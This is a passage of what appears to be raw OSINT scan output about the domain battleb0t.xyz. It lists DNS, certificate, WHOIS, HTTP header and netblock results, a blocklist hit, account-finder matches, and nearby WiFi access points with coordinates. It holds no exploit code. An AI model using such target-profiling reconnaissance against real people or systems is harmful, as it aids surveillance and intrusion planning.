60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
| battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} |
| 2023-05-12 03:09:58 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.111 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 13335 | 104.21.0.0/20 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | heberlein (Net ID: 00:02:2D:30:2C:33) | 37.7642, -122.3993 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00.github.io | 185.199.111.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:54:10:ED) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:16:26 | Physical Location | No | ipapi.co | 1 | 0 | 2 | 0 | None | Bursa, Bursa, 16, Turkey, TR | 87.248.157.102 |
| 2023-05-12 02:44:14 | Domain Name | No | DNS Resolver | 0 | 0 | 1 | 0 | None | battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PET KLINIK (Net ID: 00:12:BF:30:95:FA) | 40.2024, 29.0398 |
| 2023-05-12 03:18:06 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | http://kekw.battleb0t.xyz/jar | <!DOCTYPE html>
<html>
<iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe>
</html> |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 6 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'EHiPHm0Nl3GyThu9m1wbXjiHVtOqC3bOZB5NH6FZ4WpN/ont8bhxVwykMxIfoGSCjD8SpsL131biQUzVmplSkmz36+Rbm6LpKDPgFi1SZ6sdv468aKRPGhyFreJfGyRxilqUy5qO2EhnuYwrJjSxEU6DGEUFnqpvxw46fNgsaBRKOJ+bUVrPyznWm3WWDmCZ5I4ByfgFEH/V+llAilan1spVCzgSbbNaZnK7v2zKybgKpcf37StU8tcqkL0luzxFnWpTYEMJIRNh3502IKGm2GeIGVQUP6IIgH3pam7apk2jk/MVIAQ55tOJt6IZrTr1Qcj4biXsY3FIPVNAc0sCXlUyI683VVNAnv7kxmJ0SLq0ELP7CILJKsuRkOc2+1w90SBLDbAqCH/GEPeh86EVOXxwcNFZqRIljefJbQxhuH4JevbkysQYXa6LkLXsD5QKQE0OPjJQvEC2SmVFUO8wuJE/HZ29m2obUyVypKKxYzEuV7pCj1nVwt32aW4bF0deBcy4/M4CeO4Epb9dj4xmVGUtKMp/g+OZaEvQnjUgBRlg57NTUuvDL1hFtL478NEE',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:B1:75:22) | 39.0469, -77.4903 |
| 2023-05-12 02:45:26 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'104.21.71.14', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'104.21.0.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6547, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5A', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3623, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} | 104.21.71.14 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | vsco (Category: social)
https://vsco.co/login/gallery | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandis Wifi 5GHz (Net ID: 00:01:9F:20:CA:54) | 34.0544, -118.244 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTFhSfWa2 (Net ID: B0:DA:F9:7C:BB:40) | 37.751, -97.822 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Domain Name: 001VIET.COM
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-10-01T07:27:47Z
Creation Date: 2022-03-31T20:18:54Z
Registry Expiry Date: 2024-03-31T20:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:09:05Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: 001viet.com
Registry Domain ID: 2685910837_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-03-31T15:18:54Z
Creation Date: 2022-03-31T15:18:54Z
Registrar Registration Expiration Date: 2024-03-31T15:18:54Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=001viet.com
Name Server: NS35.DOMAINCONTROL.COM
Name Server: NS36.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:15 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 1620 Guest (Net ID: 00:01:21:30:37:7F) | 52.3759, 4.8975 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Lifestyle (Net ID: 00:06:25:61:2F:2E) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "x-powered-by": "Express", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "content-encoding": "gzip", "server": "cloudflare", "last-modified": "Tue, 01 Jan 1980 00:00:01 GMT", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=gKkAv2ueXH0GbQQgHQUB1ba%2FGC57%2Fw1l33qylJQZwo8rZZSQGe9chbhvY39IMKx8OGwCgg014ANieMLMNm0k2vb6aYv4qeDTvVzmiQmtAm9hGZFwG%2BXVyUTLjJ6w5y8UPVYOV9MG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0", "date": "Fri, 12 May 2023 02:54:18 GMT", "cf-ray": "7c5f6051f8c478df-EWR", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "content-type": "text/html; charset=UTF-8"} |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 02:53:35 | Netblock Membership | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.110.0/24 | 185.199.110.153 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:04:05) | 50.8897, 6.0563 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MGOKCEN (Net ID: 00:14:C1:20:BB:F4) | 40.2024, 29.0398 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Kircal3 (Net ID: 00:14:C1:15:7B:C1) | 40.2024, 29.0398 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | DATAVO (Net ID: 00:02:61:19:70:44) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | meet me (Category: dating)
https://www.meetme.com/login | login |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/kappi_2.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [165.232.112.0/20]
http://lists.blocklist.de/lists/all.txt | 165.232.112.0/20 |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | vscode.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:eb:b0:96:39:35:d3:30:8a:f5:f9:da:c5:cf:96:
1a:e7:f9:f3:a9:a3:ac:48:a3:a4:b9:37:4c:63:75:
40:36:2d:7f:85:6e:28:b7:ff:1d:a9:b7:7a:9e:a9:
3c:18:2e:aa:60:9b:01:a6:03:71:f5:37:c6:c4:08:
7f:2e:0c:29:9a:02:88:31:a0:12:65:5e:31:21:f1:
5f:d6:97:6e:ea:18:9d:90:ce:ff:12:3b:cb:ae:3a:
f3:b3:33:e6:51:66:ee:77:b1:1e:2d:63:9d:86:29:
e8:e7:da:f5:95:bf:4c:37:58:2b:4b:3b:b3:82:8c:
63:1f:3a:3d:4d:85:c4:0d:2f:dd:0c:39:76:ab:a5:
7c:fc:53:9d:e0:67:9e:f7:6e:00:5d:8f:60:c1:b4:
dd:6b:fb:d3:a5:23:a0:c0:99:85:04:91:d1:e3:63:
1f:33:3f:20:df:22:22:a9:89:b5:26:f8:3b:cf:ec:
a6:2f:0a:b5:ce:e9:fd:d6:cf:3c:d3:6e:35:3e:a2:
cb:0a:4c:43:1f:c2:91:d1:57:92:fc:79:bc:b6:50:
67:72:7f:f2:de:ba:e6:81:c8:81:ad:91:41:c2:41:
68:e4:66:e4:cf:77:e7:8f:ad:4a:dd:cf:21:57:7e:
5c:5b:1a:bf:18:03:99:5a:e7:0b:bf:13:4e:4f:9d:
f8:63:3c:53:43:ba:5c:2b:86:aa:b1:6c:59:33:66:
06:b4:0c:58:5e:eb:57:fb:21:90:64:8e:04:88:5e:
